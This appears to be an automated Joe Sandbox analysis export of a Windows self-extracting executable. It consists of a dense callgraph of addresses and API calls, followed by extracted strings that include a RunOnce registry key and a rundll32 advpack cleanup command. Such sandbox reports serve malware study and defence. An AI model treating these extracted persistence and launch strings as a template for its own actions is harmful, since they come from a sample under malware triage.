2497->2499 2499->2484 2500->2486 2502 7ff7e6e86adb GetWindowsDirectoryA 2500->2502 2503 7ff7e6e868f9 GetDriveTypeA 2500->2503 2505 7ff7e6e86ca4 38 API calls 2502->2505 2506 7ff7e6e86916 GetFileAttributesA 2503->2506 2517 7ff7e6e86911 2503->2517 2505->2500 2506->2517 2507 7ff7e6e864e4 53 API calls 2507->2500 2508 7ff7e6e86ca4 38 API calls 2508->2517 2509 7ff7e6e86955 GetDiskFreeSpaceA 2510 7ff7e6e86983 MulDiv 2509->2510 2509->2517 2510->2517 2511 7ff7e6e82468 25 API calls 2511->2517 2512 7ff7e6e86a02 GetWindowsDirectoryA 2512->2517 2513 7ff7e6e87ba8 CharPrevA 2514 7ff7e6e86a2a GetFileAttributesA 2513->2514 2515 7ff7e6e86a40 CreateDirectoryA 2514->2515 2514->2517 2515->2517 2516 7ff7e6e86a6d SetFileAttributesA 2516->2517 2517->2486 2517->2502 2517->2503 2517->2506 2517->2508 2517->2509 2517->2511 2517->2512 2517->2513 2517->2516 2518 7ff7e6e864e4 53 API calls 2517->2518 2518->2517 2520 7ff7e6e86d12 2519->2520 2521 7ff7e6e86d3f GetDiskFreeSpaceA 2519->2521 2524 7ff7e6e84dcc 24 API calls 2520->2524 2522 7ff7e6e86f63 memset 2521->2522 2523 7ff7e6e86d80 MulDiv 2521->2523 2736 7ff7e6e87700 GetLastError 2522->2736 2523->2522 2526 7ff7e6e86dae GetVolumeInformationA 2523->2526 2527 7ff7e6e86d2f 2524->2527 2529 7ff7e6e86de6 memset 2526->2529 2530 7ff7e6e86e45 SetCurrentDirectoryA 2526->2530 2717 7ff7e6e87700 GetLastError 2527->2717 2528 7ff7e6e86f7b GetLastError FormatMessageA 2532 7ff7e6e86fbd 2528->2532 2718 7ff7e6e87700 GetLastError 2529->2718 2540 7ff7e6e86e6c 2530->2540 2536 7ff7e6e84dcc 24 API calls 2532->2536 2534 7ff7e6e86d34 2535 7ff7e6e86f41 2534->2535 2539 7ff7e6e88470 7 API calls 2535->2539 2538 7ff7e6e86fd8 SetCurrentDirectoryA 2536->2538 2537 7ff7e6e86dfe GetLastError FormatMessageA 2537->2532 2538->2535 2541 7ff7e6e8326f 2539->2541 2542 7ff7e6e86eb4 2540->2542 2544 7ff7e6e86ed8 2540->2544 2541->2168 2541->2181 2543 7ff7e6e84dcc 24 API calls 2542->2543 2543->2534 2544->2535 2719 7ff7e6e824f8 2544->2719 2547 7ff7e6e85050 7 API calls 2546->2547 2548 7ff7e6e85dab 
FindResourceA LoadResource LockResource 2547->2548 2549 7ff7e6e85dfc 2548->2549 2565 7ff7e6e85fcf 2548->2565 2550 7ff7e6e85e08 GetDlgItem ShowWindow GetDlgItem ShowWindow 2549->2550 2551 7ff7e6e85e56 2549->2551 2550->2551 2737 7ff7e6e85c60 #20 2551->2737 2554 7ff7e6e85e69 #20 2555 7ff7e6e85e5f 2554->2555 2556 7ff7e6e85ed1 #22 2554->2556 2559 7ff7e6e84dcc 24 API calls 2555->2559 2557 7ff7e6e85f55 2556->2557 2558 7ff7e6e85f15 #23 2556->2558 2561 7ff7e6e85f75 2557->2561 2562 7ff7e6e85f61 FreeResource 2557->2562 2558->2555 2558->2557 2560 7ff7e6e85f53 2559->2560 2560->2557 2563 7ff7e6e85f9f 2561->2563 2564 7ff7e6e85f81 2561->2564 2562->2561 2563->2565 2567 7ff7e6e85fb1 SendMessageA 2563->2567 2566 7ff7e6e84dcc 24 API calls 2564->2566 2565->2200 2566->2563 2567->2565 2569 7ff7e6e84118 2568->2569 2592 7ff7e6e8412f 2568->2592 2570 7ff7e6e85050 7 API calls 2569->2570 2570->2592 2571 7ff7e6e84145 memset 2571->2592 2572 7ff7e6e84254 2573 7ff7e6e84dcc 24 API calls 2572->2573 2574 7ff7e6e84273 2573->2574 2575 7ff7e6e844ee 2574->2575 2578 7ff7e6e88470 7 API calls 2575->2578 2576 7ff7e6e85050 7 API calls 2576->2592 2579 7ff7e6e844ff 2578->2579 2579->2194 2580 7ff7e6e845d8 2580->2575 2582 7ff7e6e845f2 RegOpenKeyExA 2580->2582 2581 7ff7e6e842f5 CompareStringA 2581->2580 2581->2592 2582->2575 2586 7ff7e6e84627 RegQueryValueExA 2582->2586 2583 7ff7e6e84599 2585 7ff7e6e84dcc 24 API calls 2583->2585 2584 7ff7e6e844df LocalFree 2584->2575 2588 7ff7e6e845b8 LocalFree 2585->2588 2590 7ff7e6e8471c RegCloseKey 2586->2590 2591 7ff7e6e8466c memset GetSystemDirectoryA 2586->2591 2588->2575 2590->2575 2593 7ff7e6e8469d 2591->2593 2594 7ff7e6e846b3 2591->2594 2592->2571 2592->2572 2592->2575 2592->2576 2592->2580 2592->2581 2592->2583 2592->2584 2595 7ff7e6e841fd CompareStringA 2592->2595 2597 7ff7e6e844ad LocalFree 2592->2597 2611 7ff7e6e84394 2592->2611 2764 7ff7e6e81684 2592->2764 2803 7ff7e6e81d28 memset memset RegCreateKeyExA 2592->2803 2830 7ff7e6e8473c CreateProcessA 2592->2830 2598 
7ff7e6e87ba8 CharPrevA 2593->2598 2599 7ff7e6e8114c _vsnprintf 2594->2599 2595->2592 2597->2580 2597->2592 2598->2594 2600 7ff7e6e846dc RegSetValueExA 2599->2600 2600->2590 2601 7ff7e6e843a5 GetProcAddress 2603 7ff7e6e84521 2601->2603 2601->2611 2602 7ff7e6e84574 2604 7ff7e6e84dcc 24 API calls 2602->2604 2605 7ff7e6e84dcc 24 API calls 2603->2605 2607 7ff7e6e84597 2604->2607 2608 7ff7e6e84544 FreeLibrary 2605->2608 2609 7ff7e6e84553 LocalFree 2607->2609 2608->2609 2855 7ff7e6e87700 GetLastError 2609->2855 2611->2601 2611->2602 2612 7ff7e6e844d3 FreeLibrary 2611->2612 2613 7ff7e6e84480 FreeLibrary 2611->2613 2845 7ff7e6e879f0 2611->2845 2612->2584 2613->2597 2615 7ff7e6e85050 7 API calls 2614->2615 2616 7ff7e6e83f8b LocalAlloc 2615->2616 2617 7ff7e6e83fdd 2616->2617 2618 7ff7e6e83fad 2616->2618 2620 7ff7e6e85050 7 API calls 2617->2620 2619 7ff7e6e84dcc 24 API calls 2618->2619 2621 7ff7e6e83fcb 2619->2621 2622 7ff7e6e83fef 2620->2622 2892 7ff7e6e87700 GetLastError 2621->2892 2624 7ff7e6e83ff3 2622->2624 2625 7ff7e6e84030 lstrcmpA 2622->2625 2626 7ff7e6e84dcc 24 API calls 2624->2626 2627 7ff7e6e8404e 2625->2627 2628 7ff7e6e84098 LocalFree 2625->2628 2629 7ff7e6e84011 LocalFree 2626->2629 2630 7ff7e6e87ac8 28 API calls 2627->2630 2631 7ff7e6e83139 2628->2631 2629->2631 2632 7ff7e6e8406e LocalFree 2630->2632 2631->2161 2631->2168 2632->2631 2633->2196 2635 7ff7e6e8778a 2634->2635 2636 7ff7e6e8114c _vsnprintf 2635->2636 2642 7ff7e6e877b8 FreeResource 2635->2642 2643 7ff7e6e87803 FreeResource 2635->2643 2637 7ff7e6e877df FindResourceA 2636->2637 2638 7ff7e6e8775e LoadResource LockResource 2637->2638 2639 7ff7e6e87801 2637->2639 2638->2635 2638->2639 2640 7ff7e6e88470 7 API calls 2639->2640 2641 7ff7e6e8782e 2640->2641 2641->2184 2642->2635 2643->2639 2645 7ff7e6e85050 7 API calls 2644->2645 2646 7ff7e6e84967 LocalAlloc 2645->2646 2647 7ff7e6e849a9 2646->2647 2648 7ff7e6e84989 2646->2648 2649 7ff7e6e85050 7 API calls 2647->2649 2650 7ff7e6e84dcc 24 API calls 2648->2650 2651 
7ff7e6e849bb 2649->2651 2652 7ff7e6e849a7 2650->2652 2653 7ff7e6e849d5 lstrcmpA 2651->2653 2654 7ff7e6e849bf 2651->2654 2652->2168 2653->2654 2655 7ff7e6e84a0e LocalFree 2653->2655 2656 7ff7e6e84dcc 24 API calls 2654->2656 2655->2652 2656->2655 2657->2455 2659 7ff7e6e86516 2658->2659 2661 7ff7e6e865dd 2658->2661 2689 7ff7e6e863b8 2659->2689 2700 7ff7e6e86b70 2661->2700 2662 7ff7e6e86688 2664 7ff7e6e88470 7 API calls 2662->2664 2669 7ff7e6e866a8 2664->2669 2667 7ff7e6e865cc 2674 7ff7e6e87ba8 CharPrevA 2667->2674 2668 7ff7e6e86577 GetSystemInfo 2676 7ff7e6e86591 2668->2676 2669->2486 2683 7ff7e6e82468 GetWindowsDirectoryA 2669->2683 2670 7ff7e6e8662a CreateDirectoryA 2672 7ff7e6e8667d 2670->2672 2673 7ff7e6e8663f 2670->2673 2671 7ff7e6e86649 2671->2662 2677 7ff7e6e86ca4 38 API calls 2671->2677 2712 7ff7e6e87700 GetLastError 2672->2712 2673->2671 2674->2661 2676->2667 2679 7ff7e6e87ba8 CharPrevA 2676->2679 2680 7ff7e6e8665a 2677->2680 2678 7ff7e6e86682 2678->2662 2679->2667 2680->2662 2681 7ff7e6e86666 RemoveDirectoryA 2680->2681 2681->2662 2682->2484 2684 7ff7e6e824a6 2683->2684 2685 7ff7e6e824c4 2683->2685 2686 7ff7e6e84dcc 24 API calls 2684->2686 2687 7ff7e6e88470 7 API calls 2685->2687 2686->2685 2688 7ff7e6e824df 2687->2688 2688->2500 2688->2507 2691 7ff7e6e863e3 2689->2691 2692 7ff7e6e87ba8 CharPrevA 2691->2692 2695 7ff7e6e8644b GetTempFileNameA 2691->2695 2713 7ff7e6e8114c 2691->2713 2693 7ff7e6e86420 RemoveDirectoryA GetFileAttributesA 2692->2693 2693->2691 2694 7ff7e6e864b6 CreateDirectoryA 2693->2694 2694->2695 2696 7ff7e6e86490 2694->2696 2695->2696 2697 7ff7e6e8646b DeleteFileA CreateDirectoryA 2695->2697 2698 7ff7e6e88470 7 API calls 2696->2698 2697->2696 2699 7ff7e6e864a2 2698->2699 2699->2662 2699->2667 2699->2668 2701 7ff7e6e86b8b 2700->2701 2701->2701 2702 7ff7e6e86b94 LocalAlloc 2701->2702 2703 7ff7e6e86bf5 2702->2703 2704 7ff7e6e86bb4 2702->2704 2708 7ff7e6e87ba8 CharPrevA 2703->2708 2705 7ff7e6e84dcc 24 API calls 2704->2705 2706 7ff7e6e86bd2 
2705->2706 2709 7ff7e6e86626 2706->2709 2716 7ff7e6e87700 GetLastError 2706->2716 2710 7ff7e6e86c14 CreateFileA LocalFree 2708->2710 2709->2670 2709->2671 2710->2706 2711 7ff7e6e86c61 CloseHandle GetFileAttributesA 2710->2711 2711->2706 2712->2678 2714 7ff7e6e81178 _vsnprintf 2713->2714 2715 7ff7e6e81199 2713->2715 2714->2715 2715->2691 2716->2709 2717->2534 2718->2537 2720 7ff7e6e82525 2719->2720 2721 7ff7e6e82562 2719->2721 2724 7ff7e6e8114c _vsnprintf 2720->2724 2722 7ff7e6e825ab 2721->2722 2723 7ff7e6e82567 2721->2723 2726 7ff7e6e8255d 2722->2726 2729 7ff7e6e8114c _vsnprintf 2722->2729 2725 7ff7e6e8114c _vsnprintf 2723->2725 2727 7ff7e6e8253d 2724->2727 2728 7ff7e6e8257f 2725->2728 2730 7ff7e6e88470 7 API calls 2726->2730 2731 7ff7e6e84dcc 24 API calls 2727->2731 2732 7ff7e6e84dcc 24 API calls 2728->2732 2733 7ff7e6e825c7 2729->2733 2734 7ff7e6e82609 2730->2734 2731->2726 2732->2726 2735 7ff7e6e84dcc 24 API calls 2733->2735 2734->2535 2735->2726 2736->2528 2738 7ff7e6e85ced 2737->2738 2748 7ff7e6e85d62 2737->2748 2749 7ff7e6e85380 2738->2749 2741 7ff7e6e88470 7 API calls 2743 7ff7e6e85d78 2741->2743 2742 7ff7e6e85d0d #21 2744 7ff7e6e85d28 2742->2744 2742->2748 2743->2554 2743->2555 2744->2748 2761 7ff7e6e85770 2744->2761 2747 7ff7e6e85d4f #23 2747->2748 2748->2741 2750 7ff7e6e853b3 2749->2750 2751 7ff7e6e853fd lstrcmpA 2750->2751 2752 7ff7e6e853d0 2750->2752 2754 7ff7e6e853f4 2751->2754 2755 7ff7e6e85454 2751->2755 2753 7ff7e6e84dcc 24 API calls 2752->2753 2753->2754 2754->2742 2754->2748 2755->2754 2756 7ff7e6e854a8 CreateFileA 2755->2756 2756->2754 2758 7ff7e6e854de 2756->2758 2757 7ff7e6e85561 CreateFileA 2757->2754 2758->2754 2758->2757 2759 7ff7e6e85549 CharNextA 2758->2759 2760 7ff7e6e85532 CreateDirectoryA 2758->2760 2759->2758 2760->2759 2762 7ff7e6e857a4 CloseHandle 2761->2762 2763 7ff7e6e8578f 2761->2763 2762->2763 2763->2747 2763->2748 2765 7ff7e6e816d3 2764->2765 2856 7ff7e6e815e8 2765->2856 2768 7ff7e6e87ba8 CharPrevA 2770 7ff7e6e81766 2768->2770 
2769 7ff7e6e87d68 2 API calls 2771 7ff7e6e81811 2769->2771 2770->2769 2772 7ff7e6e81a1b 2771->2772 2773 7ff7e6e8181a CompareStringA 2771->2773 2775 7ff7e6e87d68 2 API calls 2772->2775 2773->2772 2774 7ff7e6e8184d GetFileAttributesA 2773->2774 2776 7ff7e6e81867 2774->2776 2777 7ff7e6e819f3 2774->2777 2778 7ff7e6e81a28 2775->2778 2776->2777 2781 7ff7e6e815e8 2 API calls 2776->2781 2782 7ff7e6e84dcc 24 API calls 2777->2782 2779 7ff7e6e81acb LocalAlloc 2778->2779 2780 7ff7e6e81a31 CompareStringA 2778->2780 2779->2777 2783 7ff7e6e81aeb GetFileAttributesA 2779->2783 2780->2779 2790 7ff7e6e81a60 2780->2790 2784 7ff7e6e8188b 2781->2784 2801 7ff7e6e8194f 2782->2801 2785 7ff7e6e81b01 2783->2785 2786 7ff7e6e818b5 LocalAlloc 2784->2786 2787 7ff7e6e815e8 2 API calls 2784->2787 2802 7ff7e6e81b54 2785->2802 2786->2777 2788 7ff7e6e818d7 GetPrivateProfileIntA GetPrivateProfileStringA 2786->2788 2787->2786 2792 7ff7e6e81984 2788->2792 2788->2801 2789 7ff7e6e88470 7 API calls 2793 7ff7e6e81be9 2789->2793 2790->2790 2791 7ff7e6e81a81 LocalAlloc 2790->2791 2791->2777 2794 7ff7e6e81ab2 2791->2794 2796 7ff7e6e819ba 2792->2796 2797 7ff7e6e81995 GetShortPathNameA 2792->2797 2793->2592 2798 7ff7e6e8114c _vsnprintf 2794->2798 2800 7ff7e6e8114c _vsnprintf 2796->2800 2797->2796 2798->2801 2799 7ff7e6e81bd1 2799->2789 2800->2801 2801->2799 2864 7ff7e6e82a6c 2802->2864 2804 7ff7e6e81dce 2803->2804 2805 7ff7e6e82019 2803->2805 2808 7ff7e6e8114c _vsnprintf 2804->2808 2810 7ff7e6e81e25 2804->2810 2806 7ff7e6e88470 7 API calls 2805->2806 2807 7ff7e6e82028 2806->2807 2807->2592 2809 7ff7e6e81dee RegQueryValueExA 2808->2809 2809->2804 2809->2810 2811 7ff7e6e81e29 RegCloseKey 2810->2811 2812 7ff7e6e81e46 GetSystemDirectoryA 2810->2812 2811->2805 2813 7ff7e6e87ba8 CharPrevA 2812->2813 2814 7ff7e6e81e6a LoadLibraryA 2813->2814 2815 7ff7e6e81e86 GetProcAddress FreeLibrary 2814->2815 2816 7ff7e6e81f55 GetModuleFileNameA 2814->2816 2815->2816 2818 7ff7e6e81ebe GetSystemDirectoryA 2815->2818 2817 
7ff7e6e81f78 RegCloseKey 2816->2817 2821 7ff7e6e81ee8 2816->2821 2817->2805 2819 7ff7e6e81ed5 2818->2819 2818->2821 2820 7ff7e6e87ba8 CharPrevA 2819->2820 2820->2821 2821->2821 2822 7ff7e6e81f11 LocalAlloc 2821->2822 2823 7ff7e6e81f8e 2822->2823 2824 7ff7e6e81f35 2822->2824 2825 7ff7e6e8114c _vsnprintf 2823->2825 2826 7ff7e6e84dcc 24 API calls 2824->2826 2827 7ff7e6e81fc4 2825->2827 2828 7ff7e6e81f53 2826->2828 2827->2827 2829 7ff7e6e81fcd RegSetValueExA RegCloseKey LocalFree 2827->2829 2828->2817 2829->2805 2831 7ff7e6e848b3 2830->2831 2832 7ff7e6e847c2 WaitForSingleObject GetExitCodeProcess 2830->2832 2891 7ff7e6e87700 GetLastError 2831->2891 2833 7ff7e6e847f9 2832->2833 2840 7ff7e6e82318 18 API calls 2833->2840 2844 7ff7e6e8482a CloseHandle CloseHandle 2833->2844 2835 7ff7e6e848b8 GetLastError FormatMessageA 2836 7ff7e6e84dcc 24 API calls 2835->2836 2838 7ff7e6e8491c 2836->2838 2841 7ff7e6e88470 7 API calls 2838->2841 2839 7ff7e6e848aa 2839->2838 2842 7ff7e6e8484d 2840->2842 2843 7ff7e6e8492f 2841->2843 2842->2844 2843->2592 2844->2838 2844->2839 2846 7ff7e6e87a25 2845->2846 2847 7ff7e6e87ba8 CharPrevA 2846->2847 2848 7ff7e6e87a63 GetFileAttributesA 2847->2848 2849 7ff7e6e87a79 2848->2849 2850 7ff7e6e87a96 LoadLibraryA 2848->2850 2849->2850 2851 7ff7e6e87a7d LoadLibraryExA 2849->2851 2852 7ff7e6e87aa9 2850->2852 2851->2852 2853 7ff7e6e88470 7 API calls 2852->2853 2854 7ff7e6e87ab9 2853->2854 2854->2611 2855->2574 2857 7ff7e6e81609 2856->2857 2859 7ff7e6e81621 2857->2859 2860 7ff7e6e81651 2857->2860 2877 7ff7e6e87ce8 2857->2877 2861 7ff7e6e87ce8 2 API calls 2859->2861 2860->2768 2860->2770 2862 7ff7e6e8162f 2861->2862 2862->2860 2863 7ff7e6e87ce8 2 API calls 2862->2863 2863->2862 2865 7ff7e6e82c24 2864->2865 2866 7ff7e6e82aa0 GetModuleFileNameA 2864->2866 2867 7ff7e6e88470 7 API calls 2865->2867 2866->2865 2876 7ff7e6e82ac8 2866->2876 2869 7ff7e6e82c37 2867->2869 2868 7ff7e6e82acc IsDBCSLeadByte 2868->2876 2869->2799 2870 7ff7e6e82bf6 CharNextA 2872 7ff7e6e82c08 
CharNextA 2870->2872 2871 7ff7e6e82af1 CharNextA CharUpperA 2873 7ff7e6e82b9b CharUpperA 2871->2873 2871->2876 2872->2865 2872->2868 2873->2876 2875 7ff7e6e82b36 CharPrevA 2875->2876 2876->2868 2876->2870 2876->2871 2876->2872 2876->2875 2882 7ff7e6e87c40 2876->2882 2880 7ff7e6e87d00 2877->2880 2878 7ff7e6e87d47 2878->2857 2879 7ff7e6e87d0a IsDBCSLeadByte 2879->2878 2879->2880 2880->2878 2880->2879 2881 7ff7e6e87d30 CharNextA 2880->2881 2881->2880 2883 7ff7e6e87c58 2882->2883 2883->2883 2884 7ff7e6e87c61 CharPrevA 2883->2884 2885 7ff7e6e87c7d CharPrevA 2884->2885 2886 7ff7e6e87c75 2885->2886 2887 7ff7e6e87c94 2885->2887 2886->2885 2886->2887 2888 7ff7e6e87c9e CharPrevA 2887->2888 2889 7ff7e6e87cb5 CharNextA 2887->2889 2890 7ff7e6e87cc7 2887->2890 2888->2889 2888->2890 2889->2890 2890->2876 2891->2835 2892->2631 2894 7ff7e6e822eb 2893->2894 2895 7ff7e6e82281 2893->2895 2897 7ff7e6e88470 7 API calls 2894->2897 2896 7ff7e6e87ba8 CharPrevA 2895->2896 2898 7ff7e6e82294 WritePrivateProfileStringA _lopen 2896->2898 2899 7ff7e6e822fd 2897->2899 2898->2894 2900 7ff7e6e822c7 _llseek _lclose 2898->2900 2899->2226 2900->2894 3081 7ff7e6e81500 3082 7ff7e6e81557 GetDesktopWindow 3081->3082 3084 7ff7e6e81530 3081->3084 3083 7ff7e6e84c68 14 API calls 3082->3083 3087 7ff7e6e8156e LoadStringA SetDlgItemTextA MessageBeep 3083->3087 3085 7ff7e6e81553 3084->3085 3086 7ff7e6e81542 EndDialog 3084->3086 3088 7ff7e6e88470 7 API calls 3085->3088 3086->3085 3087->3085 3089 7ff7e6e815d0 3088->3089 3090 7ff7e6e83840 3091 7ff7e6e83852 3090->3091 3094 7ff7e6e8385a 3090->3094 3093 7ff7e6e8388e GetDesktopWindow 3091->3093 3091->3094 3092 7ff7e6e838ec EndDialog 3096 7ff7e6e8385f 3092->3096 3095 7ff7e6e84c68 14 API calls 3093->3095 3094->3092 3094->3096 3097 7ff7e6e838a5 SetWindowTextA SetDlgItemTextA SetForegroundWindow 3095->3097 3097->3096 2989 7ff7e6e881b0 __getmainargs 2990 7ff7e6e88b30 _XcptFilter 2943 7ff7e6e858b0 2944 7ff7e6e858ee 2943->2944 2945 7ff7e6e85904 2943->2945 2946 7ff7e6e85770 
CloseHandle 2944->2946 2951 7ff7e6e858fc 2944->2951 2948 7ff7e6e85a29 2945->2948 2945->2951 2952 7ff7e6e8591a 2945->2952 2946->2951 2947 7ff7e6e88470 7 API calls 2950 7ff7e6e85af4 2947->2950 2949 7ff7e6e85a35 SetWindowTextA 2948->2949 2953 7ff7e6e85a4a 2948->2953 2949->2953 2951->2947 2952->2951 2954 7ff7e6e85982 DosDateTimeToFileTime 2952->2954 2953->2951 2968 7ff7e6e851bc GetFileAttributesA 2953->2968 2954->2951 2956 7ff7e6e859a3 LocalFileTimeToFileTime 2954->2956 2956->2951 2958 7ff7e6e859c1 SetFileTime 2956->2958 2958->2951 2959 7ff7e6e859e9 2958->2959 2961 7ff7e6e85770 CloseHandle 2959->2961 2960 7ff7e6e85380 29 API calls 2962 7ff7e6e85ab5 2960->2962 2963 7ff7e6e859f2 SetFileAttributesA 2961->2963 2962->2951 2964 7ff7e6e85ac1 2962->2964 2963->2951 2975 7ff7e6e8527c LocalAlloc 2964->2975 2966 7ff7e6e85acb 2966->2951 2969 7ff7e6e8525f 2968->2969 2971 7ff7e6e851de 2968->2971 2969->2951 2969->2960 2970 7ff7e6e85246 SetFileAttributesA 2970->2969 2971->2969 2971->2970 2972 7ff7e6e87ac8 28 API calls 2971->2972 2973 7ff7e6e85228 2972->2973 2973->2969 2973->2970 2974 7ff7e6e8523c 2973->2974 2974->2970 2976 7ff7e6e852aa 2975->2976 2977 7ff7e6e852d4 LocalAlloc 2975->2977 2978 7ff7e6e84dcc 24 API calls 2976->2978 2980 7ff7e6e85300 2977->2980 2982 7ff7e6e852cd 2977->2982 2978->2982 2981 7ff7e6e84dcc 24 API calls 2980->2981 2983 7ff7e6e85323 LocalFree 2981->2983 2982->2966 2983->2982 3000 7ff7e6e833f0 3001 7ff7e6e834ec 3000->3001 3002 7ff7e6e83402 3000->3002 3004 7ff7e6e834f5 SendDlgItemMessageA 3001->3004 3005 7ff7e6e834e5 3001->3005 3003 7ff7e6e8340f 3002->3003 3006 7ff7e6e83441 GetDesktopWindow 3002->3006 3003->3005 3007 7ff7e6e83430 EndDialog 3003->3007 3004->3005 3008 7ff7e6e84c68 14 API calls 3006->3008 3007->3005 3009 7ff7e6e83458 6 API calls 3008->3009 3009->3005 3010 7ff7e6e85870 GlobalAlloc 3011 7ff7e6e878b0 3012 7ff7e6e878fd 3011->3012 3013 7ff7e6e87ba8 CharPrevA 3012->3013 3014 7ff7e6e87935 CreateFileA 3013->3014 3015 7ff7e6e8797e WriteFile 3014->3015 3016 
7ff7e6e87970 3014->3016 3017 7ff7e6e879a2 CloseHandle 3015->3017 3019 7ff7e6e88470 7 API calls 3016->3019 3017->3016 3020 7ff7e6e879d5 3019->3020 3021 7ff7e6e84a30 3022 7ff7e6e84a39 SendMessageA 3021->3022 3023 7ff7e6e84a50 3021->3023 3022->3023 3024 7ff7e6e83530 3025 7ff7e6e83557 3024->3025 3026 7ff7e6e83802 EndDialog 3024->3026 3027 7ff7e6e8377e GetDesktopWindow 3025->3027 3028 7ff7e6e83567 3025->3028 3035 7ff7e6e8356b 3026->3035 3029 7ff7e6e84c68 14 API calls 3027->3029 3030 7ff7e6e8357b 3028->3030 3031 7ff7e6e83635 GetDlgItemTextA 3028->3031 3028->3035 3032 7ff7e6e83795 SetWindowTextA SendDlgItemMessageA 3029->3032 3033 7ff7e6e83618 EndDialog 3030->3033 3034 7ff7e6e83584 3030->3034 3040 7ff7e6e8365e 3031->3040 3056 7ff7e6e836e9 3031->3056 3032->3035 3036 7ff7e6e837d8 GetDlgItem EnableWindow 3032->3036 3033->3035 3034->3035 3037 7ff7e6e83591 LoadStringA 3034->3037 3036->3035 3038 7ff7e6e835de 3037->3038 3039 7ff7e6e835bd 3037->3039 3061 7ff7e6e84a60 LoadLibraryA 3038->3061 3044 7ff7e6e84dcc 24 API calls 3039->3044 3043 7ff7e6e83694 GetFileAttributesA 3040->3043 3040->3056 3042 7ff7e6e84dcc 24 API calls 3042->3035 3046 7ff7e6e836fa 3043->3046 3047 7ff7e6e836a8 3043->3047 3060 7ff7e6e835d7 3044->3060 3051 7ff7e6e87ba8 CharPrevA 3046->3051 3049 7ff7e6e84dcc 24 API calls 3047->3049 3048 7ff7e6e835eb SetDlgItemTextA 3048->3035 3048->3039 3052 7ff7e6e836cb 3049->3052 3050 7ff7e6e8374b EndDialog 3050->3035 3053 7ff7e6e8370e 3051->3053 3052->3035 3054 7ff7e6e836d4 CreateDirectoryA 3052->3054 3055 7ff7e6e86b70 31 API calls 3053->3055 3054->3046 3054->3056 3057 7ff7e6e83716 3055->3057 3056->3042 3057->3056 3058 7ff7e6e83721 3057->3058 3059 7ff7e6e86ca4 38 API calls 3058->3059 3058->3060 3059->3060 3060->3035 3060->3050 3062 7ff7e6e84c20 3061->3062 3063 7ff7e6e84aa0 GetProcAddress 3061->3063 3067 7ff7e6e84dcc 24 API calls 3062->3067 3064 7ff7e6e84c0a FreeLibrary 3063->3064 3065 7ff7e6e84ac2 GetProcAddress 3063->3065 3064->3062 3065->3064 3066 7ff7e6e84ae2 GetProcAddress 
3065->3066 3066->3064 3068 7ff7e6e84b04 3066->3068 3069 7ff7e6e835e3 3067->3069 3070 7ff7e6e84b13 GetTempPathA 3068->3070 3075 7ff7e6e84b65 3068->3075 3069->3035 3069->3048 3071 7ff7e6e84b2b 3070->3071 3071->3071 3072 7ff7e6e84b34 CharPrevA 3071->3072 3074 7ff7e6e84b4e CharPrevA 3072->3074 3072->3075 3073 7ff7e6e84bee FreeLibrary 3073->3069 3074->3075 3075->3073 3076 7ff7e6e88417 3077 7ff7e6e8842f 3076->3077 3078 7ff7e6e88426 _exit 3076->3078 3079 7ff7e6e88444 3077->3079 3080 7ff7e6e88438 _cexit 3077->3080 3078->3077 3080->3079 3098 7ff7e6e855e0 3099 7ff7e6e85641 ReadFile 3098->3099 3100 7ff7e6e8560d 3098->3100 3099->3100 3101 7ff7e6e857e0 3102 7ff7e6e8581e 3101->3102 3104 7ff7e6e857fc 3101->3104 3103 7ff7e6e8583d SetFilePointer 3102->3103 3102->3104 3103->3104 3105 7ff7e6e833a0 3106 7ff7e6e833ac 3105->3106 3107 7ff7e6e833bb CallWindowProcA 3105->3107 3106->3107 3108 7ff7e6e833b7 3106->3108 3107->3108

Callgraph


                                                                                                        Control-flow Graph

                                                                                                         • Executed / Not Executed basic-block graph for the function starting at 7ff7e6e840c4 (rendered as an image; block listing not reproduced). Windows APIs referenced from its blocks: memset, CompareStringA, RegOpenKeyExA, RegQueryValueExA, GetSystemDirectoryA, RegSetValueExA, RegCloseKey, GetProcAddress, FreeLibrary, LocalFree
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                         • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmp
                                                                                                         • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmp
                                                                                                         • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                         • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Resource$Free$CompareFindLibraryLocalString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                        • String ID: <None>$ADMQCMD$Adv$C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$Software\Microsoft\Windows\CurrentVersion\RunOnce$USRQCMD$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                                                                                                        • API String ID: 2679723528-151385680
                                                                                                        • Opcode ID: 47eb29a787de270268fb154fbc2d409703058abd89df6d54f7005b929927f1b1
                                                                                                        • Instruction ID: 96d120f3e714eb5deb84fe091a524bf5a5a7bcfad9180fc3b0746b83a77b642a
                                                                                                        • Opcode Fuzzy Hash: 47eb29a787de270268fb154fbc2d409703058abd89df6d54f7005b929927f1b1
                                                                                                        • Instruction Fuzzy Hash: A7024D71A287C286E760AB14AC407BBB7A0FB85B44F980137DA8E4B6D4DF3CD545C722

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                         • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmp
                                                                                                         • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmp
                                                                                                         • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                         • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                        Joe Sandbox IDA Plugin
